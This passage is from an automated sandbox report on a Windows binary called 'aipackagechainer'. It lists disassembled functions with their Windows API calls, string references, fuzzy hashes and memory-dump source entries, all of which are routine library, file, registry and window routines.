SysFreeString.OLEAUT32 ref: 000BB8B3

Strings

P?5w, xrefs: 000BB887

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: String$Free
String ID: P?5w
API String ID: 1391021980-2838385722
Opcode ID: 1f87d48bf3f5ade38f3e28346d2e2263094354bfd1e35acf184e397db7d70538
Instruction ID: 658ad1bef6a26cd0db1d6e85f3e725b4fa5f6a5bcbbe4bff9779620a43812bc1
Opcode Fuzzy Hash: 1f87d48bf3f5ade38f3e28346d2e2263094354bfd1e35acf184e397db7d70538
Instruction Fuzzy Hash: 19014B76904245EFE7208F58DD05B6ABBECEF04710F10066AF851936A0EB7A5900DA40

Function 00089E10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 000CC839: EnterCriticalSection.KERNEL32(00128FDC,?,00000000,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5,?,00000000), ref: 000CC844
Part of subcall function 000CC839: LeaveCriticalSection.KERNEL32(00128FDC,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5,?,00000000), ref: 000CC881

LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr), ref: 00089E6E
GetProcAddress.KERNEL32(00000000), ref: 00089E75

Part of subcall function 000CC7EF: EnterCriticalSection.KERNEL32(00128FDC,00000000,?,000639E7,001298D8,000FD280), ref: 000CC7F9
Part of subcall function 000CC7EF: LeaveCriticalSection.KERNEL32(00128FDC,?,000639E7,001298D8,000FD280), ref: 000CC82C
Part of subcall function 000CC7EF: RtlWakeAllConditionVariable.NTDLL ref: 000CC8A3

Strings

Dbghelp.dll, xrefs: 00089E69
SymFromAddr, xrefs: 00089E64

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AddressConditionLibraryLoadProcVariableWake
String ID: Dbghelp.dll$SymFromAddr
API String ID: 3620240239-642441706
Opcode ID: 6af6649729dbc9819f7b703f251d9945af190a6dd9aaf94e3c2d37fb11e5f787
Instruction ID: e8f7c13fc90f808d89280f39f77c211e69f4e47db864ad1e56b3744bb72a7073
Opcode Fuzzy Hash: 6af6649729dbc9819f7b703f251d9945af190a6dd9aaf94e3c2d37fb11e5f787
Instruction Fuzzy Hash: 37019E71A48648EFD720DF98ED81F9977B4E708724F140A69E81583BD0D7757950CA10

Function 000D12F7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(0010C440,00000000,00000800,?,000D12A8,?,?,00000000,?,?,?,000D13D2,00000002,FlsGetValue,000FFDD8,FlsGetValue), ref: 000D1304
GetLastError.KERNEL32(?,000D12A8,?,?,00000000,?,?,?,000D13D2,00000002,FlsGetValue,000FFDD8,FlsGetValue,?,?,000CE441), ref: 000D130E
LoadLibraryExW.KERNEL32(0010C440,00000000,00000000,0008ABBC,0010C440,00000002,D11C52E5), ref: 000D1336

Strings

api-ms-, xrefs: 000D131B

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 9fba13a44a272c65a7131b8b5b38a2e2c5006e9813a8bcc1cd7bcb4b8126858d
Instruction ID: ceecaaf16bf2964d31779f0664bb2b68c22e627ea8656e198bc1a39fe336698d
Opcode Fuzzy Hash: 9fba13a44a272c65a7131b8b5b38a2e2c5006e9813a8bcc1cd7bcb4b8126858d
Instruction Fuzzy Hash: 64E01230380308B6FB501B50DC06FE83B96AB10B50F140031F90CE89F1DFA59990A669

Function 00083110 Relevance: 6.4, APIs: 5, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?,?,?), ref: 00083129
LocalFree.KERNEL32(?,80004005), ref: 00083139
GetLastError.KERNEL32(?,80004005), ref: 00083177
LocalAlloc.KERNEL32(00000040,00000014,?,80004005), ref: 000831B6
GetLastError.KERNEL32(?,00000000,?,80004005), ref: 000831D0

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Local$ErrorFreeLast$Alloc
String ID:
API String ID: 1946577522-0
Opcode ID: d0229f2b9a0074e41939ca8d6973eb54433c8b08fc32384571752735d52a4dee
Instruction ID: 0a51d2722d312fe17009b69e0ea59a7070427b520f7fd12ad26603bb85371370
Opcode Fuzzy Hash: d0229f2b9a0074e41939ca8d6973eb54433c8b08fc32384571752735d52a4dee
Instruction Fuzzy Hash: FB313A70604705AFEB60AF75DC48B57B7E8FF84B10F04492EE986C2550EB74E909CBA1

Function 000E0068 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(D11C52E5,00000000,00000000,00000000), ref: 000E00CB

Part of subcall function 000E40A2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,000DFEB7,?,00000000,-00000008), ref: 000E414E

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 000E0326
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 000E036E
GetLastError.KERNEL32 ref: 000E0411

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 2ae22bc7310818c1d8f761c0a6008983e3958d9287f2c054a2e0fd855bc1a376
Instruction ID: 6ce22c2e728e2c20d9f5d9777c4321233e9b16bccd41bfcdb482ecb587c2903d
Opcode Fuzzy Hash: 2ae22bc7310818c1d8f761c0a6008983e3958d9287f2c054a2e0fd855bc1a376
Instruction Fuzzy Hash: 67D158B5D00298AFCB15CFA9D880AEDBBF4FF08304F18456AE955FB251D770A982CB50

Function 0009AF60 Relevance: 6.2, APIs: 4, Instructions: 182COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0009B098
GetForegroundWindow.USER32(?,?,?,000000FF), ref: 0009B0A8
SetForegroundWindow.USER32(00000000), ref: 0009B0E4

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

OutputDebugStringW.KERNEL32(?,D11C52E5,?,?,?,000000FF,?,000A6ADC,?,?,?,?), ref: 0009B138

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$Foreground$ActiveDebugHeapOutputProcessString
String ID:
API String ID: 799693181-0
Opcode ID: fdaab816a6a2be6f91063194dc57726a51b12b9f9307144d40b50cee0462f9e6
Instruction ID: 55c5214d8107679e430c95a9c1304441b2c7c83e6c1d53fbac8355bab10baefe
Opcode Fuzzy Hash: fdaab816a6a2be6f91063194dc57726a51b12b9f9307144d40b50cee0462f9e6
Instruction Fuzzy Hash: 14513471A006059FDF14DB68D9497AEB7F5EF85320F18826DE816973E1EB309D00CB91

Function 000D0332 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 000D03F9
___AdjustPointer.LIBCMT ref: 000D041C
___AdjustPointer.LIBCMT ref: 000D04B8

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 2762dd5845e2178ff109613d1d2bf4f803f5965c72d8fcf5d303665b6282b829
Instruction ID: 6a77d1ba091de8c3fdbb6f25b3822bd45e1f6ff726bd78efa00caf8301646fc9
Opcode Fuzzy Hash: 2762dd5845e2178ff109613d1d2bf4f803f5965c72d8fcf5d303665b6282b829
Instruction Fuzzy Hash: 2B51AFB2601706AFEB298F14D841FFA77A4EF54310F14452EEA0997392E771ED90CBA0

Function 000C9140 Relevance: 6.2, APIs: 4, Instructions: 150COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?), ref: 000C92D0
GetLastError.KERNEL32 ref: 000C92DC
SetEvent.KERNEL32(?), ref: 000C92F5
GetLastError.KERNEL32 ref: 000C92FB

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorEventLast
String ID:
API String ID: 3848097054-0
Opcode ID: 735cf2b1629f086f96abc6f475a4c5a03c240368f5938f3e26950c0ff7923975
Instruction ID: c9922fbca97532b67fb529e8690553c8d57a490b2e6e554e8ebd86151baea8e1
Opcode Fuzzy Hash: 735cf2b1629f086f96abc6f475a4c5a03c240368f5938f3e26950c0ff7923975
Instruction Fuzzy Hash: D06105B1901251CFEB64CF18C8D8B5A3BE5BF44318F1542A8DD489F28AD7BAD949CF90

Function 000A9D00 Relevance: 6.1, APIs: 4, Instructions: 148fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,D11C52E5,?,?,?,?,?,?,00000000,000F99C5), ref: 000A9D49
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,000F99C5,000000FF), ref: 000A9D71
ReadFile.KERNEL32(?,?,00010000,?,00000000,00010000,?,?,?,00000000,000F99C5,000000FF), ref: 000A9DEF
CloseHandle.KERNEL32(00000000,?,?,?,00000000,000F99C5,000000FF), ref: 000A9EA6

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: d0045758bf8b85f623db9978faf11b0cdb4fca1abd0908c09bc56178524ef56a
Instruction ID: f7be7662181406c3579d5bfd758c3d7110027004826002e618241126dfa3c455
Opcode Fuzzy Hash: d0045758bf8b85f623db9978faf11b0cdb4fca1abd0908c09bc56178524ef56a
Instruction Fuzzy Hash: C451F372A00248EFEB20CFA4CC85BEEBBF8FF56310F244159E95567292D7745A09CB51

Function 0007F990 Relevance: 6.1, APIs: 4, Instructions: 124registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?,D11C52E5,0010D600,00000000,00000000,?,?,?,?,?,?,?), ref: 0007FA0D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,000F168D,000000FF), ref: 0007FA2D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,000F168D,000000FF), ref: 0007FAB0
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,000F168D,000000FF), ref: 0007FADC

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Close$Open
String ID:
API String ID: 2976201327-0
Opcode ID: cd640a4ddba2ea10e85d31c7628c1b02499d199d97348a9fdde26d278a5d7c46
Instruction ID: df0d8fbdb6c9705cbcb5b61cabae44d2f86e9e4c79e374d726e6282fb8317f31
Opcode Fuzzy Hash: cd640a4ddba2ea10e85d31c7628c1b02499d199d97348a9fdde26d278a5d7c46
Instruction Fuzzy Hash: E841EBB1D0121AABDB20DF95CC45FEFBBF8EF48750F144129E919A7280D7789A05CBA4

Function 000A8E00 Relevance: 6.1, APIs: 4, Instructions: 98windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?), ref: 000A8E3E

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

SetWindowTextW.USER32(?,00000010), ref: 000A8E71
IsWindow.USER32(?), ref: 000A8EE6
EndDialog.USER32(?,00000001), ref: 000A8F0A

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$DialogHeapMessageProcessSendText
String ID:
API String ID: 3967821603-0
Opcode ID: 380041953634d41d2fefad049e7ee9e77ee16a2559556105f0759d1fd1553bba
Instruction ID: cddeb6b87f1a8acb47b0ea8458262da041de0c9ee82145e3aa8dcf33b9b0fc13
Opcode Fuzzy Hash: 380041953634d41d2fefad049e7ee9e77ee16a2559556105f0759d1fd1553bba
Instruction Fuzzy Hash: 9C315C71601A05EFD714DF65CC48F96BBE5FF09720F108629FA25D76A0DB72A910CB90

Function 00098810 Relevance: 6.1, APIs: 4, Instructions: 96threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0012BCD4,D11C52E5), ref: 0009884D
GetCurrentThreadId.KERNEL32 ref: 00098861
LeaveCriticalSection.KERNEL32(0012BCD4), ref: 0009889F
SetWindowLongW.USER32(?,00000004,00000000), ref: 000988FB

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CriticalSection$CurrentEnterLeaveLongThreadWindow
String ID:
API String ID: 3550545212-0
Opcode ID: a9e5a251a4c7adfbd7e3c64d51b0233e8617ae69a28925645280e269313ed863
Instruction ID: 3bd9fc90d3918c3acfff2343110ba2e1c10b26351bad61ff37601807f02fdcc6
Opcode Fuzzy Hash: a9e5a251a4c7adfbd7e3c64d51b0233e8617ae69a28925645280e269313ed863
Instruction Fuzzy Hash: 1531C032A04259AFDB20CF65DC44B6BBBF8FF45720F04862AE91593750DF71A810DBA1

Function 000BB000 Relevance: 6.1, APIs: 4, Instructions: 85fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000B39A0: SetFilePointer.KERNEL32(?,00000000,?,00000001,D11C52E5,?,?,?,Function_0008C250,000000FF), ref: 000B39D5
Part of subcall function 000B39A0: GetLastError.KERNEL32(?,00000000,?,00000001,D11C52E5,?,?,?,Function_0008C250,000000FF), ref: 000B39E2

GetLastError.KERNEL32 ref: 000BB0A7

Part of subcall function 000B3A40: SetFilePointer.KERNEL32(?,?,?,?,D11C52E5,?,?,?,?,?,Function_0008C230,000000FF), ref: 000B3A7A
Part of subcall function 000B3A40: GetLastError.KERNEL32(?,?,?,?,D11C52E5,?,?,?,?,?,Function_0008C230,000000FF), ref: 000B3A87
Part of subcall function 000B3A40: SetLastError.KERNEL32(00000000,?,?,?,?,D11C52E5,?,?,?,?,?,Function_0008C230,000000FF), ref: 000B3A9E

SetEndOfFile.KERNEL32(?), ref: 000BB056
GetLastError.KERNEL32 ref: 000BB069
SetLastError.KERNEL32(00000000), ref: 000BB08E

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$File$Pointer
String ID:
API String ID: 4162258135-0
Opcode ID: fd302d138bda6328ba38f656b809004ec99e15d4c47fff2732312e62139757a8
Instruction ID: 393c98b6098d1e74125eb10372ac708f3949e9e45998e7b53a3a0eb240b0c166
Opcode Fuzzy Hash: fd302d138bda6328ba38f656b809004ec99e15d4c47fff2732312e62139757a8
Instruction Fuzzy Hash: 5721F2322102059B9720EE29EC40AFFB7D9EF80355F14462AFD64C7161EB72CC5496A1

Function 000C9480 Relevance: 6.1, APIs: 4, Instructions: 69synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 000C94AE
GetLastError.KERNEL32 ref: 000C94B9
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 000C9521
GetLastError.KERNEL32 ref: 000C952B

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$ObjectReleaseSemaphoreSingleWait
String ID:
API String ID: 1636903514-0
Opcode ID: 940144310d816ea6ea37dafb31f2f6dc6143714ea2e2506f14d344fcad64f29a
Instruction ID: e099a81f40b11cb167f183bf0f53a75f1e68d39a3cd57ec180c70a75403a2ee5
Opcode Fuzzy Hash: 940144310d816ea6ea37dafb31f2f6dc6143714ea2e2506f14d344fcad64f29a
Instruction Fuzzy Hash: 7E212132200B408BEB718F69E88CF5FB7E5BF90321F148A1DE1A5865A2E770D844DB51

Function 000ADC40 Relevance: 6.1, APIs: 4, Instructions: 62synchronizationCOMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?,?,?,000ACF82,?,?,?,?,?,00000003,00000000,D11C52E5,?,?), ref: 000ADC52
GetLastError.KERNEL32(?,?,000ACF82,?,?,?,?,?,00000003,00000000,D11C52E5,?,?), ref: 000ADC7F
WaitForSingleObject.KERNEL32(?,0000000A,?,?,000ACF82,?,?,?,?,?,00000003,00000000,D11C52E5,?,?), ref: 000ADCB5
SetEvent.KERNEL32(?,?,?,000ACF82,?,?,?,?,?,00000003,00000000,D11C52E5,?,?), ref: 000ADCD8

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Event$ErrorLastObjectResetSingleWait
String ID:
API String ID: 708712559-0
Opcode ID: b480a193a3546262ed64519376ae1ff3b268bb20b5b80567ff3ef1d7ab3fe2e6
Instruction ID: c9d0ff3c605882528c3ef3a5fc4b3cf7d9640ba81a80b9e00ae13898ec69c8b2
Opcode Fuzzy Hash: b480a193a3546262ed64519376ae1ff3b268bb20b5b80567ff3ef1d7ab3fe2e6
Instruction Fuzzy Hash: 35118C316047418EEBB09B65E948B567BE6BB62330F44482FE08386E61C7B4E8C2DB50

Function 000A7D60 Relevance: 6.1, APIs: 4, Instructions: 51threadsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?,D11C52E5,?,?,?,Function_0008C250,000000FF), ref: 000A7D97
GetExitCodeThread.KERNEL32(?,?,?,?,?,Function_0008C250,000000FF), ref: 000A7DB1
TerminateThread.KERNEL32(?,00000000,?,?,?,Function_0008C250,000000FF), ref: 000A7DC9
CloseHandle.KERNEL32(?,?,?,?,Function_0008C250,000000FF), ref: 000A7DD2

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Thread$CloseCodeExitHandleObjectSingleTerminateWait
String ID:
API String ID: 3774109050-0
Opcode ID: 45b82dcff4552d75efe7eb12abcecedbb15e703ece53faae9d7e375366cb01d2
Instruction ID: 4a47a9b0ef050a2061612b1f81552a10977948a4e96002c03a7630e8ed8da97b
Opcode Fuzzy Hash: 45b82dcff4552d75efe7eb12abcecedbb15e703ece53faae9d7e375366cb01d2
Instruction Fuzzy Hash: 6111A971504745AFE7218F64DD05FBAB7FCFF05710F008629F929926A0DB75A940CB50

Function 000A7FB0 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 000A7FCD
DestroyWindow.USER32(?), ref: 000A7FDA
IsWindow.USER32(?), ref: 000A8034
SendMessageW.USER32(?,00000407,00000000,?), ref: 000A804D

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$DestroyMessageSend
String ID:
API String ID: 746073012-0
Opcode ID: fba7a6d486edd2014d99615873a75a74d3d507cdb0d96059c1e3735b4925950c
Instruction ID: 55d1a1b509a8f60069441816886b81b78771ce70eea43439a5909248af91ea71
Opcode Fuzzy Hash: fba7a6d486edd2014d99615873a75a74d3d507cdb0d96059c1e3735b4925950c
Instruction Fuzzy Hash: C8113A305093019FD390DF58C948B5ABBF0FF49700F50892EF48992660E775E944DF62

Function 000CAA8D Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 000CAA94
std::_Lockit::_Lockit.LIBCPMT ref: 000CAA9F
std::_Lockit::~_Lockit.LIBCPMT ref: 000CAB0D

Part of subcall function 000CABEF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 000CAC07

std::locale::_Setgloballocale.LIBCPMT ref: 000CAABA

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
String ID:
